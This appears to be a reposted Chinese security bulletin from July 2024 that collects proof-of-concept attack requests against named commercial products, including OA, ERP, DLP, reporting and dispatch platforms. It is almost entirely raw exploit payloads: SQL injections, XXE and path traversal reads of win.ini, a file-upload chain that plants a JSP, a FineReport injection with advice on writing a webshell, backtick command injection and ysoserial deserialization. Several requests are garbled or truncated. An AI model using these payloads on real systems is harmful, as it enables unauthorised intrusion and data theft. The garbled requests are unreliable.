2024.7.22
通天星CMSV6车载视频监控平台 disable存在SQL注入 漏洞
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0(Macintosh; Intel Mac OS X10_15_7)AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63Safari/537.36
亿赛通数据泄露防护(DLP)系统 NetSecConfigAjaxSQL注入 漏洞
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1Host: xxxxxContent-Type: application/x-www-form-urlencodedcommand=updateNetSec&state=123';if(selectIS_SRVROLEMEMBER('sysadmin'))=1WAITFOR DELAY'0:0:5'--
亿赛通数据泄露防护(DLP)系统 NoticeAjaxSQL注入漏洞
POST /CDGServer3/NoticeAjax;Service HTTP/1.1Host: xxxxxContent-Type: application/x-www-form-urlencodedcommand=delNotice¬iceId=123';if(selectIS_SRVROLEMEMBER('sysadmin'))
天问物业ERP系统 AreaAvatarDownLoad.aspx 任意文件读 取漏洞
=../web.config HTTP/1.1Host:xxx:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
启明星辰 天玥网络安全审计系统 SQL注入漏洞
python sqlmap.py-u "https://ip/ops/index.php?c=Reportguide&a=checkrn"--data "checkname=123&tagid=123"--skip-waf--random-agent--dbs--batch--force-ssl致远OAfileUpload.do 前台文件上传绕过漏洞
1.上传图片马,返回fileid值
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1Host: xxxxxxAccept: text/html, image/gif, image/jpeg, *; q=.2, * / *; q=.2Content-Type: multipart/form-data; boundary=00content0boundary00User-Agent: Mozilla/5.0(Windows; U; Windows NT5.1; zh-CN)AppleWebKit/523.15(KHTML, like Gecko, Safari/419.3) Arora/0.3(Change:287c9dfb30)Content-Length:754--00content0boundary00Content-Disposition: form-data; name="type"--00content0boundary00Content-Disposition: form-data; name="extensions"png--00content0boundary00Content-Disposition: form-data; name="applicationCategory"--00content0boundary00Content-Disposition: form-data; name="destDirectory"--00content0boundary00Content-Disposition: form-data; name="destFilename"--00content0boundary00Content-Disposition: form-data; name="maxSize"--00content0boundary00Content-Disposition: form-data; name="isEncrypt"false--00content0boundary00Content-Disposition: form-data; name="file1"; filename="1.png"Content-Type: Content-Type: application/pdf<%out.println("hello");%>--00content0boundary00--
2、修改文件后缀为jsp
POST/seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1Host:xxxxxxxAccept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2:application/x-www-form-urlencoded:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser;SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506):64method=uploadMenuIcon&fileid=ID 值&filename=qwe.jsp
3、访问jsp文件触发恶意jsp代码
GET/seeyon/main/menuIcon/qwe.jsp HTTP/1.1Host:
F5 BIG-IP 远程代码执行漏洞
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-46747.yaml用友U8cloudMonitorServlet 反序列化漏洞
java-jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.serPOST/service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1Host: xxxxxxUser-Agent: Mozilla/5.0(Macintosh;IntelMac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/116.0.0.0Safari/537.36恶意序列化数据
万户OASQL注入漏洞
python sqlmap.py -u "http://xxxxxxxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1"--level 3--dbs锐捷 RG-NBS2026G-P 交换机WEB管理 ping.htm 未授权 访问漏洞
访问页面 /safety/ping.htm福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞
/app/ext/ajax_users.php福建科立讯通信 指挥调度管理平台 ajax_users.phpSQL注入漏洞
POST/app/ext/ajax_users.php HTTP/1.1Host::Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info:application/x-www-form-urlencodeddep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-
福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60echo%20test%3Etest.txt%60 HTTP/1.1Host:User-Agent: Mozilla/5.0(Windows NT6.3; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/36.0.1985.143Safari/537.36Accept-Encoding: gzip, deflateAccept: */*
2024.7.23
广联达Linkworks ArchiveWebService XML实体注入漏洞
POST/GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1Host:xxxxx:text/xml; charset=utf-8:lengthSOAPAction:"http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"version="1.0" encoding="utf-8"?>:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">:Body>xmlns="http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx"><archiveInfo><!DOCTYPE Archive [
    <!ENTITY secret SYSTEM "file:///windows/win.ini">
]>

<Archive>  
    <ArchiveInfo>  
        <UploaderID>
############


&secret;


##############
</UploaderID>  
    </ArchiveInfo>  
    <Result>  
        <MainDoc>Document Content</MainDoc>  
    </Result>  
    <DocInfo>  
        <DocTypeID>1</DocTypeID>  
        <DocVersion>1.0</DocVersion>  
    </DocInfo>  
</Archive></archiveInfo><folderIdList>string</folderIdList><platId>string</platId></PostArchiveInfo>:Body>:Envelope>
致远互联AnalyticsCloud分析云 任意文件读取漏洞
GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c://windows/win.ini HTTP/1.1Host: xxxxxxCache-Control: max-age=0Upgrade-Insecure-Requests:1User-Agent: Mozilla/5.0(Macintosh; Intel Mac OS X10_15_7)AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.0.0Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection:close
润乾报表 dataSphereServlet 任意文件读取漏洞
POST/demo/servlet/dataSphereServlet?action=11 HTTP/1.1Host:172.23.80.126:6868:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36:application/x-www-form-urlencoded:68path=../../../../../../../../../../../windows/win.ini&content=&mode=
联软安渡UniNXG安全数据交换系统 SQL注入漏洞
/UniExServices/link/queryLinklnfo?address=%27%3BSELECT%20PG_SLEEP%285%29--
帆软FineReport ReportSever Sqlite 注入导致远程代码执行 漏洞
GET /webroot/decision/view/ReportServer?test=ssssss&n=${a=sql('FRDemo',DECODE('%ef%bb%bfattach%20database%20%27%2E%2E%2Fwebapps%2Fwebroot%2Ftest%2Ejsp%27%20as%20%27test%27%3B'),1,1)}HTTP/1.1Host: xxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0)Gecko/20100101 Firefox/128.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1
若返回302,且Location中存在n=true,且成功创建test.jsp,则漏洞存在。可进一步创 建表、insert 等方式来写入webshell。
浪潮云财务系统 bizintegrationwebservice 命令执行漏洞
POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1Host: Content-Type: text/xml; charset=utf-8Content-Length: 16396SOAPAction: "http://tempuri.org/GetChildFormAndEntityList"<soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetChildFormAndEntityListxmlns="http://tempuri.org/"><baseFormID>string</baseFormID><baseEntityID>string</baseEntityID><strFormAssignment>反序列化数据</strFormAssignment><isBase>0</isBase></GetChildFormAndEntityList></soap:Body></soap:Envelope>
内容来自微步,原版pdf 后台回复 微步在线 获取
原文始发于微信公众号(合规渗透):HW2024-07-23-微步验真漏洞情报合集
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论